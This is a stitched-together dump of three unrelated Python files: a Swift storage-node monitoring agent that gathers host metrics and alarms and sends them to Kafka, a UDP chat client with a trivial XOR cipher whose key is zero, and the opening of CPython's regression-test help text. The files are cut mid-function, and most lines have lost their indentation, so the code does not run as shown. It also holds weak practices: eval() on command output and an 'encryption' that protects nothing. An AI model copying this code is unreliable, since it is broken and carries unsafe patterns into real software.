disk_capacity[group['disk_lname']] = "{}-{}".format(str(grouprec['disk_capacity']),str(grouprec['disk_type']))
if grouprec.has_key('disk_rw_rate'):
disk_rate[group['disk_lname']] = str(grouprec['disk_rw_rate'])
disk_number['disknum'] = disknum
disk_number['diskgroup'] = diskgroup
rec['disk_type'] = json.dumps(raid_type,encoding='utf-8',ensure_ascii=True)
rec['disk_number'] = json.dumps(disk_number,encoding='utf-8',ensure_ascii=True)
rec['disk_useful_size'] = json.dumps(disk_usize,encoding='utf-8',ensure_ascii=True)
rec['disk_capacity'] = json.dumps(disk_capacity,encoding='utf-8',ensure_ascii=True)
rec['disk_rw_rate'] = json.dumps(disk_rate,encoding='utf-8',ensure_ascii=True)
return rec
except Exception as ex:
logger.exception("get_lsi_disk_dev_info function excute exception:" + str(ex))
def get_lsscsi_disk_info(self):
'''
        Get the list of logical disks and return it as a list.
:return:
'''
try:
scsirec = []
scsidata = util.exct_cmd('lsscsi')
for data in scsidata:
disk = {}
if data:
regex = re.compile('\s+')
disk['scsi_type'] = regex.split(data)[1].strip()
if str(disk['scsi_type']).upper() == "DISK":
disk_id = re.search("[:0-9]+", data)
if disk_id :
disk['disk_id'] = disk_id.group(0).strip()
else:
continue
disk_lname = re.search("/dev/.*", data)
if disk_lname :
disk['disk_lname'] = disk_lname.group(0).strip()
else:
disk['disk_lname'] = "-"
disk['disk_manufacturer'] = regex.split(data)[2].strip()
scsirec.append(disk)
return scsirec
except Exception as ex:
raise RuntimeError("get_lsscsi_disk_info function excute exception:" + str(ex))
def get_lsi_diskgroup_info(self,adapter='0', startline='DISK GROUP: 0', endline='DISK GROUP: 1'):
'''
        Get disk group information from an LSI controller.
:param adapter:
:param startline:
:param endline:
:return:
'''
try:
groupdata = util.excute_command('/opt/MegaRAID/MegaCli/MegaCli64 -CfgDsply -a '+ adapter)
groupinfo = re.search("{}[\s\S]*{}\n".format(startline,endline), groupdata)
if groupinfo:
return groupinfo.group(0)
else:
endline = "Exit Code: 0x00"
groupinfo = re.search("{}[\s\S]*{}".format(startline, endline), groupdata)
if groupinfo:
return groupinfo.group(0)
else:
return "N/A"
except Exception as ex:
logger.exception("get_lsi_diskgroup_info function excute exception:" + str(ex))
def get_rings(self):
'''
        List the ring.gz and swift.conf files under /etc/swift.
:return:
'''
try:
result = util.excute_command("ls /etc/swift/ |grep \"ring.gz\|swift.conf\"")
if result :
parser = result.split('\n')
parser = filter(lambda x: x, parser)
return parser
except Exception as ex:
logger.exception("get_rings function excute exception:" + str(ex))
def get_ring_file_md5(self, ring_gz_name):
'''
        Compute the MD5 of the file contents for the given file name.
:param ring_gz_name:
:return:
'''
ring_gz_name = '/etc/swift/' + ring_gz_name
try:
result = util.excute_command('md5sum %s'%(ring_gz_name))
if result :
parser = result.split(' ')
ring_md5 = parser[0]
return ring_md5
except Exception as ex:
logger.exception("get_ring_file_md5 function excute exception:" + str(ex))
def get_cluster_ring_info(self):
'''
        Collect cluster configuration information from the swift ring files.
:return:
'''
try:
ringinfo = {}
ac_ring = {}
cn_ring = {}
ob_ring = {}
process_stat = util.excute_command('ps -ef |grep python |grep swift')
if process_stat:
pro_parser = reg_templates.NodeServiceParser(process_stat)
pro_res = pro_parser.parse()
if pro_res.has_key('srv_proxy'):
if os.path.exists('/etc/swift/account.builder'):
res_ac = util.excute_command("swift-ring-builder account.builder |sed -n '2p'")
ac_parser = reg_templates.RingParser(res_ac)
tmp_res = ac_parser.parse()
if tmp_res:
for key in tmp_res.keys():
ac_ring[key] = str(tmp_res[key]).strip()
ringinfo['account'] = ac_ring
if os.path.exists('/etc/swift/container.builder'):
res_cn = util.excute_command("swift-ring-builder container.builder |sed -n '2p'")
cn_parser = reg_templates.RingParser(res_cn)
tmp_res = cn_parser.parse()
if tmp_res:
for key in tmp_res.keys():
cn_ring[key] = str(tmp_res[key]).strip()
ringinfo['container'] = cn_ring
if os.path.exists('/etc/swift/object.builder'):
res_ob = util.excute_command("swift-ring-builder object.builder |sed -n '2p'")
ob_parser = reg_templates.RingParser(res_ob)
tmp_res = ob_parser.parse()
if tmp_res:
for key in tmp_res.keys():
ob_ring[key] = str(tmp_res[key]).strip()
ringinfo['object'] = ob_ring
if ringinfo:
return json.dumps(ringinfo,ensure_ascii=True,encoding='utf-8')
else:
return None
except Exception as ex:
logger.exception("get_cluster_ring_info function excute exception:" + str(ex))
class NodeStat(object):
'''
    Collects various runtime status data from the running host.
'''
def __init__(self):
pass
def get_sys_stat_info(self):
'''
        Get the host's runtime status data, mainly taken from the top command.
:return:
'''
try:
rec = {}
            data = util.excute_command('top -bi -n 2 -d 0.02')  # the first top sample is inaccurate, so take two samples and use the second
parser = reg_templates.OsStat(data)
rec = parser.parse()
            # correct the memory figures using psutil
result = psutil.virtual_memory()
rec['mem_total'] = str(result.total)
rec['mem_free'] = str(result.free)
rec['mem_used'] = str(result.used)
rec['mem_buffers'] = str(result.buffers)
sres = psutil.swap_memory()
rec['swap_total'] = str(sres.total)
rec['swap_free'] = str(sres.free)
rec['swap_used'] = str(sres.used)
rec['swap_cached'] = str(result.cached)
osres = psutil.users()
rec['host_login_users'] = len(osres)
osruntime = psutil.boot_time()
rec['host_runtime'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(osruntime))
return rec
except Exception as ex:
logger.exception("get_sys_stat_info function excute exception:" + str(ex))
def get_net_stat_info(self):
'''
        Get runtime data for every NIC on the host, returned as a dict.
:return:
'''
try:
nicinfo = {}
            #res = psutil.net_io_counters(pernic=True)  # per-NIC status counters
res = util.net_io_counters()
result = util.excute_command('ip a')
parser = reg_templates.EthernetParser(result)
rec = parser.parse()
nets = rec['net'].split(',')
packsent = {}
packrecv = {}
bytesent = {}
byterecv = {}
errin = {}
errout = {}
dropin = {}
dropout = {}
netused = {}
for net in nets:
if net :
tmpkey = str(net).strip()
if res.has_key(tmpkey):
bytesent[tmpkey] = str(res[tmpkey][0])
byterecv[tmpkey] = str(res[tmpkey][1])
packsent[tmpkey] = str(res[tmpkey][2])
packrecv[tmpkey] = str(res[tmpkey][3])
errin[tmpkey] = str(res[tmpkey][4])
errout[tmpkey] = str(res[tmpkey][5])
dropin[tmpkey] = str(res[tmpkey][6])
dropout[tmpkey] = str(res[tmpkey][7])
nicinfo['net_uesd'] = json.dumps(netused, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_send_packages'] = json.dumps(packsent, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_recv_packages'] = json.dumps(packrecv, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_send_bytes'] = json.dumps(bytesent, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_recv_bytes'] = json.dumps(byterecv, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_in_err'] = json.dumps(errin, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_out_err'] = json.dumps(errout, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_in_drop'] = json.dumps(dropin, encoding="UTF-8", ensure_ascii=True)
nicinfo['net_out_drop'] = json.dumps(dropout, encoding="UTF-8", ensure_ascii=True)
return nicinfo
except Exception as ex:
logger.exception("get_net_stat_info function excute exception:" + str(ex))
def get_disk_stat_info(self):
'''
        Return disk usage data as a list.
:return:
'''
try:
host = HostInfo()
hostdisks = []
disks = host.get_disk_names()
if disks:
dn = util.excute_command("ls /dev/|grep sd").split('\n')
iores = psutil.disk_io_counters(perdisk=True)
partres = psutil.disk_partitions()
for disk in dn:
diskinfo = {}
dsk = str(disk).strip()
ds = '/dev/' + dsk
tmpds = util.excute_command('blkid ' + ds)
if not tmpds or 'UUID=' not in tmpds:
continue
tmppar = reg_templates.DiskUuidParser(tmpds)
tmprec = tmppar.parse()
if tmprec.has_key('disk_uuid'):
diskinfo['disk_uuid'] = tmprec['disk_uuid']
else:
diskinfo['disk_uuid'] = 'N/A'
diskinfo['disk_name'] = dsk
mpath = '/'
for dev in partres:
if dev.device == ds:
mpath = dev.mountpoint
                    #unmounted disks report all values as 0
tmpres = psutil.disk_usage(mpath)
if tmpres:
if '/srv/node' not in str(mpath).lower():
diskinfo['disk_total'] = 0
else:
diskinfo['disk_total'] = str(tmpres.total)
diskinfo['disk_used'] = str(tmpres.used)
diskinfo['disk_free'] = str(tmpres.free)
diskinfo['disk_percent'] = tmpres.percent
else:
diskinfo['disk_total'] = 0
diskinfo['disk_used'] = 0
diskinfo['disk_free'] = 0
diskinfo['disk_percent'] = 0
if iores and iores.has_key(dsk):
diskinfo['read_count'] = str(iores[dsk].read_count)
diskinfo['write_count'] = str(iores[dsk].write_count)
diskinfo['read_bytes'] = str(iores[dsk].read_bytes)
diskinfo['write_bytes'] = str(iores[dsk].write_bytes)
diskinfo['read_time'] = str(iores[dsk].read_time)
diskinfo['write_time'] = str(iores[dsk].write_time)
diskinfo['read_merged_count'] = str(iores[dsk].read_merged_count)
diskinfo['write_merged_count'] = str(iores[dsk].write_merged_count)
diskinfo['busy_time'] = iores[dsk].busy_time
else:
diskinfo['read_count'] = 0
diskinfo['write_count'] = 0
diskinfo['read_bytes'] = 0
diskinfo['write_bytes'] = 0
diskinfo['read_time'] = 0
diskinfo['write_time'] = 0
diskinfo['read_merged_count'] = 0
diskinfo['write_merged_count'] = 0
diskinfo['busy_time'] = 0
diskinfo['guid'] = str(uuid.uuid1())
diskinfo['data_model'] = 'SfoDiskPerform'
diskinfo['host_name'] = socket.getfqdn()
diskinfo['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
hostdisks.append(diskinfo)
return hostdisks
except Exception as ex:
logger.exception("get_disk_stat_info function excute exception:" + str(ex))
def get_cpu_freq_info(self):
'''
        Get the frequency of each CPU core and return it as JSON.
:return:
'''
res = {}
try:
data = util.excute_command('ls -l /sys/devices/system/cpu/')
if data:
parser = reg_templates.CpuName(data)
rec = parser.parse()
if rec and isinstance(rec,dict):
if rec.has_key('cpu_id'):
cpuids = str(rec['cpu_id']).split(',')
for ci in cpuids:
if os.path.exists('/sys/devices/system/cpu/'+ str(ci).strip() +'/cpufreq/cpuinfo_cur_freq'):
result = util.excute_command(r'cat /sys/devices/system/cpu/'+ str(ci).strip() +'/cpufreq/cpuinfo_cur_freq')
if str(result).isdigit():
res[str(ci).strip()] = float(result)/1000000
else:
res[str(ci).strip()] = 'N/A'
else:
res[str(ci).strip()] = 'N/A'
return json.dumps(res, encoding="UTF-8", ensure_ascii=True)
except Exception as ex:
logger.exception("get_cpu_freq_info function excute exception:" + str(ex))
class InfoAcquisition(object):
'''
    Collects data and produces it to Kafka.
'''
def __init__(self):
pass
def get_host_json(self):
'''
        Collect the host's hardware information: OS, BIOS, CPU, memory, NIC and disk details.
        :return: data is produced to kafka
'''
hostinfo = HostInfo()
kfk = ProduceKafkaInfo()
try:
host = {}
host['guid'] = str(uuid.uuid1())
host['data_model'] = 'SfoHostInfo'
osinfo = hostinfo.get_os_info()
if osinfo and isinstance(osinfo,dict):
for key in osinfo.keys():
host[key] = osinfo[key]
mfinfo = hostinfo.get_bios_dev_info()
if mfinfo and isinstance(mfinfo,dict):
for key in mfinfo.keys():
host[key] = mfinfo[key]
cpuinfo = hostinfo.get_cpu_dev_info()
if cpuinfo[0] and isinstance(cpuinfo[0],dict):
for key in cpuinfo[0].keys():
host[key] = cpuinfo[0][key]
nicinfo = hostinfo.get_net_dev_info()
if nicinfo and isinstance(nicinfo,dict):
for key in nicinfo.keys():
host[key] = nicinfo[key]
diskinfo = hostinfo.get_disk_dev_info()
if diskinfo and isinstance(diskinfo,dict):
for key in diskinfo.keys():
host[key] = diskinfo[key]
host['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(host, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_host_json function excute exception:" + str(ex))
def get_node_json(self, model):
'''
        Collect the system's runtime performance data and the host NIC performance data and write them to kafka.
        :param model: the data model name to tag the record with
        :return: data is produced to kafka
'''
nodestat = NodeStat()
kfk = ProduceKafkaInfo()
node = {}
try:
node['guid'] = str(uuid.uuid1())
node['data_model'] = model
node['host_name'] = socket.getfqdn()
nodesysinfo = nodestat.get_sys_stat_info()
if nodesysinfo and isinstance(nodesysinfo,dict):
for key in nodesysinfo.keys():
node[key] = nodesysinfo[key]
nodenetinfo = nodestat.get_net_stat_info()
if nodenetinfo and isinstance(nodenetinfo,dict):
for key in nodenetinfo.keys():
node[key] = nodenetinfo[key]
node['cpu_core_used'] = psutil.cpu_percent(interval=1, percpu=True)
cpu_freq = nodestat.get_cpu_freq_info()
if util.is_json(cpu_freq):
node['cpu_core_frq'] = cpu_freq
else:
node['cpu_core_frq'] = json.dumps(cpu_freq, encoding="UTF-8", ensure_ascii=True)
node['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(node, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_node_json function excute exception:" + str(ex))
def get_node_disk_stat_json(self):
'''
        Serialize the node's disk information and performance data to JSON and produce it to kafka.
        :return: data is produced to kafka
'''
kfk = ProduceKafkaInfo()
try:
node = NodeStat()
res = node.get_disk_stat_info()
if res:
data = json.dumps(res, encoding="UTF-8", ensure_ascii=True)
kfk.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_node_disk_stat_json function excute exception:" + str(ex))
def get_ring_json(self):
'''
        Get the MD5 values of the key files on the host.
        :return: data is produced to kafka
'''
hostinfo = HostInfo()
kfk = ProduceKafkaInfo()
rings = hostinfo.get_rings()
hostname = socket.getfqdn()
ip = socket.gethostbyname(hostname)
ring = {}
ring_ins = {}
extend = {}
try:
for ring_name in rings:
ring_md5 = hostinfo.get_ring_file_md5(ring_name)
ring_ins.update({ring_name: ring_md5})
ring['guid'] = str(uuid.uuid1())
ring['data_model'] = 'SfoHostRing'
ring['rings_md5'] = json.dumps(ring_ins,encoding="UTF-8", ensure_ascii=True)
ring['host_name'] = hostname
ring['ip_addr'] = ip
ring['ring_info'] = hostinfo.get_cluster_ring_info()
if os.path.exists("/etc/swift/passwd"):
extend['passwdmd5'] = util.excute_command("md5sum /etc/swift/passwd |awk '{print $1}'")
if os.path.exists("/etc/swift/object-server/object-rep-server.conf"):
extend['object-rep-server.conf'] = util.excute_command("md5sum /etc/swift/object-server/object-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/object-server/object-server.conf"):
extend['object-server.conf'] = util.excute_command("md5sum /etc/swift/object-server/object-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/account-server/account-rep-server.conf"):
extend['account-rep-server.conf'] = util.excute_command("md5sum /etc/swift/account-server/account-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/account-server/account-server.conf"):
extend['account-server.conf'] = util.excute_command("md5sum /etc/swift/account-server/account-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/container-server/container-rep-server.conf"):
extend['container-rep-server.conf'] = util.excute_command("md5sum /etc/swift/container-server/container-rep-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/container-server/container-rep-server.conf"):
extend['container-server.conf'] = util.excute_command("md5sum /etc/swift/container-server/container-server.conf |awk '{print $1}'")
if os.path.exists("/etc/swift/proxy-server.conf"):
extend['proxy-server.conf'] = util.excute_command("md5sum /etc/swift/proxy-server.conf |awk '{print $1}'")
ring['extend'] = json.dumps(extend, encoding="UTF-8", ensure_ascii=True)
ring['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(ring, encoding="UTF-8", ensure_ascii=True)
if data:
kfk.produce_kafka_info(config.kafka_sys_topic, data)
        except Exception as ex:
logger.exception("get_ring_json function excute exception:" + str(ex))
def get_host_monitor_json(self):
'''
        Collect monitoring data.
        Also generates alarms for host CPU, memory, network and disk usage.
        :return: data is produced to kafka
'''
pri = ProduceKafkaInfo()
try:
data = {}
netstatinfo = {}
netuseinfo = {}
fileinfo = {}
filerwinfo = {}
data['guid'] = str(uuid.uuid1())
data['data_model'] = 'SfoHostMonitor'
data['cluster_name'] = config.swift_cluster_name
data['host_name'] = socket.getfqdn()
#cpu used rate
cpurate = psutil.cpu_percent(interval=1, percpu=False)
data['host_cpu_rate'] = cpurate
if float(cpurate) - 60.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "cpu-rate-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'CPU-USED'
if float(cpurate) - 80.0 > 0:
alarmdata['alarm_message'] = 'host cpu has used {}%,it`s more than 80 percent'.format("%.2f"%cpurate)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'host cpu has used {}%,it`s more than 60 percent'.format("%.2f"%cpurate)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata,encoding='utf-8',ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic,alert)
            #memory used rate
memrate = psutil.virtual_memory()
data['host_mem_rate'] = memrate.percent
if float(memrate.percent) - 60.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "memory-rate-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'MEM-USED'
if float(memrate.percent) - 90.0 > 0:
alarmdata['alarm_message'] = 'host memory has used {}%,it`s more than 90 percent'.format("%.2f"%memrate.percent)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'host memory has used {}%,it`s more than 60 percent'.format("%.2f"%memrate.percent)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata,encoding='utf-8',ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
#net stat and used info
netstat = psutil.net_if_stats()
netuse1 = psutil.net_io_counters(pernic=True)
time.sleep(1)
netuse2 = psutil.net_io_counters(pernic=True)
for key in netstat.keys():
if 'eth' in str(key).lower() or 'bond' in str(key).lower():
if str(netstat[key].isup).upper() == 'TRUE':
netstatinfo[key] = 'OK'
netspeed = netstat[key].speed
if netspeed > 0:
#byte -> Mb 1048576 = 1024 * 1024
sent = (float(netuse2[key].bytes_sent) - float(netuse1[key].bytes_sent))*8/1048576/float(netspeed)
recv = (float(netuse2[key].bytes_recv) - float(netuse1[key].bytes_recv))*8/1048576/float(netspeed)
if sent - recv > 0:
netuseinfo[key] = round(sent,4)
else:
netuseinfo[key] = round(recv,4)
if float(netuseinfo[key]) - 0.3 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-rate-{}".format(str(key),str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'NET-USED'
if float(netuseinfo[key]) - 0.4 > 0:
alarmdata['alarm_message'] = 'network card traffic has used {}%,it`s more than 40 percent'.format("%.2f"%(float(netuseinfo[key])*100))
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'network card traffic has used {}%,it`s more than 30 percent'.format("%.2f"%(float(netuseinfo[key])*100))
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
else:
netuseinfo[key] = 0.0
else:
netstatinfo[key] = 'DOWN'
data['host_net_rate'] = json.dumps(netuseinfo, encoding="UTF-8", ensure_ascii=True)
data['host_net_stat'] = json.dumps(netstatinfo, encoding="UTF-8", ensure_ascii=True)
#disk stat
data['host_disk_stat'] = ''
#file system info
disks = psutil.disk_partitions()
for disk in disks:
disk_usage = psutil.disk_usage(disk.mountpoint)
fileinfo[disk.mountpoint] = disk_usage.percent
if float(disk_usage.percent) - 70.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-file-rate-{}".format(str(disk.mountpoint), str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'FILE-USED'
if float(disk_usage.percent) - 80.0 > 0:
alarmdata['alarm_message'] = 'the file system capacity has used {}%,it`s more than 80 percent'.format("%.2f"%disk_usage.percent)
alarmdata['alarm_level'] = 'critical'
else:
alarmdata['alarm_message'] = 'the file system capacity has used {}%,it`s more than 70 percent'.format("%.2f"%disk_usage.percent)
alarmdata['alarm_level'] = 'warning'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
filecmd = "touch {}".format(str(disk.mountpoint+'/sfo_test.txt'))
if util.excute_command(filecmd) == "SUCCESS":
filerwinfo[disk.mountpoint] = 'OK'
else:
unwrited = False
for retry in range(4):
if util.excute_command(filecmd) == "SUCCESS":
filerwinfo[disk.mountpoint] = 'OK'
unwrited = False
break
else:
unwrited = True
time.sleep(1)
if unwrited:
filerwinfo[disk.mountpoint] = 'ERROR'
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "{}-file-write-{}".format(str(disk.mountpoint), str(data['host_name']))
alarmdata['alarm_type'] = "hardware"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'FILE-WRITE'
alarmdata['alarm_message'] = 'the file system {} can not write success'.format(str(disk.mountpoint))
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
data['host_file_rate'] = json.dumps(fileinfo, encoding="UTF-8", ensure_ascii=True)
data['host_rw_file'] = json.dumps(filerwinfo, encoding="UTF-8", ensure_ascii=True)
#ntp time
data['host_ntp_time'] = 101.1
#extend
extend = {}
#ntpd.service
extend['ntpd'] = util.excute_command("systemctl status ntpd.service|grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
if 'running' != str(extend['ntpd']).strip().lower():
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "ntpd-service-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "software"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'NTP Service'
alarmdata['alarm_message'] = 'the host ntpd service is not running'
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
else:
data['host_ntp_time'] = util.excute_command("ntpq -p |sed -n '3p'|awk '{print $9}'")
# ntp time alarm
if type(eval(str(data['host_ntp_time']))) == float:
if abs(float(data['host_ntp_time'])) - 100.0 > 0:
alarmdata = {}
alarmdata['guid'] = str(uuid.uuid1())
alarmdata['data_model'] = 'SfoAlarmLog'
alarmdata['alarm_device'] = "time-offset-{}".format(str(data['host_name']))
alarmdata['alarm_type'] = "software"
alarmdata['hostname'] = data['host_name']
alarmdata['device_name'] = 'Time Offset'
alarmdata['alarm_message'] = 'the host time offset was {},it`s off ntp server more than 100 ms'.format("%.2f" % abs(float(data['host_ntp_time'])))
alarmdata['alarm_level'] = 'critical'
alarmdata['alarm_result'] = '0'
alarmdata['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
alert = json.dumps(alarmdata, encoding='utf-8', ensure_ascii=True)
if alert:
pri.produce_kafka_info(config.kafka_sys_topic, alert)
#memcached
extend['memcached'] = util.excute_command("systemctl status memcached |grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
#rsyncd
extend['rsyncd'] = util.excute_command("systemctl status rsyncd.service|grep -w 'Active'|awk 'match($0,/Active:.*\((.*)\)/,a) {print a[1]}'")
data['extend'] = json.dumps(extend, encoding="UTF-8", ensure_ascii=True)
data['add_time'] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
data = json.dumps(data, encoding="UTF-8", ensure_ascii=True)
if data:
pri.produce_kafka_info(config.kafka_sys_topic, data)
except Exception as ex:
logger.exception("get_host_monitor_json function excute exception:" + str(ex))
|
client.py
|
import socket, threading, time
key = 0
server = ('192.168.1.49',9090) # default server
host = socket.gethostbyname(socket.gethostname())
#host = '192.168.1.49'
port = 0
shutdown = False
join = False
def receiving (name, sock):
while not shutdown:
try:
while True:
data, addr = sock.recvfrom(1024)
my_time = time.ctime()
                # decryption
decrypt = ""; k = False
for i in data.decode("utf-8"):
if i == ":":
k = True
decrypt += i
elif k == False or i == " ":
decrypt += i
else:
decrypt += chr(ord(i)^key)
print("[" + str(my_time) + "] " + decrypt)
time.sleep(0.2)
except:
pass
my_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
my_socket.bind((host,port))
my_socket.setblocking(0)
print("You joined to " + str(server))
# look up the nickname in the config file (create it on first run)
try:
    userC = open('user_settings.txt', 'r')
    user_name = userC.readline().strip()
    userC.close()
except IOError:
    user_name = ""
if user_name == "":
    user_name = str(input("Please, write your nickname... "))
    u = open('user_settings.txt', 'w')
    u.write(user_name)
    u.close()
thread = threading.Thread(target = receiving, args = ("RecvThread", my_socket))
thread.start()
while shutdown == False:
if join == False:
my_socket.sendto((user_name + " => join chat ").encode("utf-8"), server)
join = True
else:
try:
message = input()
# Begin
crypt = ""
for i in message:
crypt += chr(ord(i)^key)
message = crypt
# End
if message != "":
my_socket.sendto((user_name + ":: "+message).encode("utf-8"), server)
time.sleep(0.2)
except:
my_socket.sendto((user_name + " <= left chat ").encode("utf-8"), server)
shutdown = True
thread.join()
my_socket.close()
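# XOR round-trip sketch (illustrative; with the default key = 0 the "encryption"
# above is a no-op, since x ^ 0 == x):
#
#   def xor_text(text, k):
#       return ''.join(chr(ord(c) ^ k) for c in text)
#
#   assert xor_text(xor_text('hello', 42), 42) == 'hello'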
|
regrtest.py
|
#! /usr/bin/env python3
"""
Script to run Python regression tests.
Run this script with -h or --help for documentation.
"""
USAGE = """\
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
"""
DESCRIPTION = """\
Run Python regression tests.
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
"""
EPILOG = """\
Additional option details:
-r randomizes test execution order. You can use --randseed=int to provide an
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, which process tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order of a standard run (i.e., this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain that containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines how much memory the
tests will limit themselves to (but they may go slightly over.) The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
